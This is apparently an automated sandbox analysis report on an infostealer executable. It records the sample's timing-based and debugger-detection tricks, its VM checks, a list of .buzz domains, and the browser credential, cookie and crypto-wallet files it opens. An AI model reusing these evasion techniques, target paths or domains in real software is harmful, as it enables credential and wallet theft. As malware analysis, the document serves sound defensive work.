                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 5300A77 second address: 5300AB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, si 0x00000010 call 00007F29FC524586h 0x00000015 pop esi 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 5300AB3 second address: 5300AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 5300AB9 second address: 5300ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 5300ABD second address: 5300B3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007F29FC6B5CA6h 0x0000000e mov esi, dword ptr [ebp+0Ch] 0x00000011 pushad 0x00000012 mov bx, ax 0x00000015 pushad 0x00000016 jmp 00007F29FC6B5CA8h 0x0000001b mov si, 3FC1h 0x0000001f popad 0x00000020 popad 0x00000021 test esi, esi 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F29FC6B5C9Ah 0x0000002a and esi, 7143DBD8h 0x00000030 jmp 00007F29FC6B5C9Bh 0x00000035 popfd 0x00000036 mov edx, esi 0x00000038 popad 0x00000039 je 00007F2A6C793528h 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F29FC6B5C9Ch 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 5300B3B second address: 5300B3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 5300B3F second address: 5300B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 5300B45 second address: 5300B73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 0D6C4A13h 0x00000008 jmp 00007F29FC524588h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 cmp dword ptr [7544459Ch], 05h 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 5300B73 second address: 5300B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pop esi 0x0000000a pop edi 0x0000000b popad 0x0000000c je 00007F2A6C7AB5AEh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 5300B8A second address: 5300BE9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F29FC524586h 0x00000008 or esi, 43F4E228h 0x0000000e jmp 00007F29FC52457Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov bl, ah 0x00000018 popad 0x00000019 push esi 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F29FC52457Eh 0x00000021 add eax, 1F6C9488h 0x00000027 jmp 00007F29FC52457Bh 0x0000002c popfd 0x0000002d mov edx, eax 0x0000002f popad 0x00000030 mov dword ptr [esp], esi 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 5300BE9 second address: 5300BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 5300BED second address: 5300C04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524583h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 5300C04 second address: 5300C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 5300C0A second address: 5300C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 5300C0E second address: 5300C12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 5300CB8 second address: 5300CD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524588h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 5300CD8 second address: 5300CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe Special instruction interceptor: First address: 1B8A46 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\zi042476Iv.exe Special instruction interceptor: First address: 35C358 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\zi042476Iv.exe Special instruction interceptor: First address: 35C701 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\zi042476Iv.exe Special instruction interceptor: First address: 382D6C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\zi042476Iv.exe Special instruction interceptor: First address: 3E3AE7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\zi042476Iv.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\zi042476Iv.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\zi042476Iv.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\zi042476Iv.exe TID: 2216 Thread sleep time: -32016s >= -30000s
                Source: C:\Users\user\Desktop\zi042476Iv.exe TID: 5640 Thread sleep time: -150000s >= -30000s
                Source: C:\Users\user\Desktop\zi042476Iv.exe TID: 6880 Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\zi042476Iv.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: zi042476Iv.exe, zi042476Iv.exe, 00000000.00000002.1618070433.000000000033E000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696497155j
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696497155
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: zi042476Iv.exe, 00000000.00000002.1619575461.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1617473281.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1529546451.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000002.1619850261.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1550699749.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1381810990.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1551564568.00000000012FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: zi042476Iv.exe, 00000000.00000003.1617473281.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1529546451.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000002.1619850261.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1550699749.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1381810990.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1551564568.00000000012FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWbi[$
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696497155o
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696497155x
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: zi042476Iv.exe, 00000000.00000003.1405616593.0000000005CD5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696497155p
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696497155
                Source: zi042476Iv.exe, 00000000.00000003.1405616593.0000000005CD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696497155
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696497155f
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696497155t
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696497155s
                Source: zi042476Iv.exe, 00000000.00000002.1618070433.000000000033E000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Users\user\Desktop\zi042476Iv.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\zi042476Iv.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\zi042476Iv.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\zi042476Iv.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\zi042476Iv.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\zi042476Iv.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\zi042476Iv.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\zi042476Iv.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\zi042476Iv.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\zi042476Iv.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\zi042476Iv.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\zi042476Iv.exe File opened: NTICE
                Source: C:\Users\user\Desktop\zi042476Iv.exe File opened: SICE
                Source: C:\Users\user\Desktop\zi042476Iv.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\zi042476Iv.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\zi042476Iv.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\zi042476Iv.exe Process queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

                Source: zi042476Iv.exe | String found in binary or memory: hummskitnj.buzz
                Source: zi042476Iv.exe | String found in binary or memory: cashfuzysao.buzz
                Source: zi042476Iv.exe | String found in binary or memory: appliacnesot.buzz
                Source: zi042476Iv.exe | String found in binary or memory: screwamusresz.buzz
                Source: zi042476Iv.exe | String found in binary or memory: inherineau.buzz
                Source: zi042476Iv.exe | String found in binary or memory: scentniej.buzz
                Source: zi042476Iv.exe | String found in binary or memory: rebuildeso.buzz
                Source: zi042476Iv.exe | String found in binary or memory: prisonyfork.buzz
                Source: zi042476Iv.exe | String found in binary or memory: mindhandru.buzz
                Source: zi042476Iv.exe, 00000000.00000002.1618370549.0000000000382000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: zi042476Iv.exe, 00000000.00000003.1554987288.0000000005CAC000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000002.1619575461.00000000012E3000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1551564568.00000000012FB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\zi042476Iv.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match | File source: Process Memory Space: zi042476Iv.exe PID: 6492, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: zi042476Iv.exe, 00000000.00000003.1617473281.00000000012FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
                Source: zi042476Iv.exe, 00000000.00000003.1617473281.00000000012FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
                Source: zi042476Iv.exe, 00000000.00000003.1617473281.00000000012FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
                Source: zi042476Iv.exe, 00000000.00000003.1529546451.00000000012FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Jaxx Liberty
                Source: zi042476Iv.exe, 00000000.00000003.1529546451.00000000012FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: zi042476Iv.exe | String found in binary or memory: ExodusWeb3
                Source: zi042476Iv.exe, 00000000.00000003.1617473281.00000000012FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Ethereum
                Source: zi042476Iv.exe | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: zi042476Iv.exe, 00000000.00000003.1529489593.0000000001352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
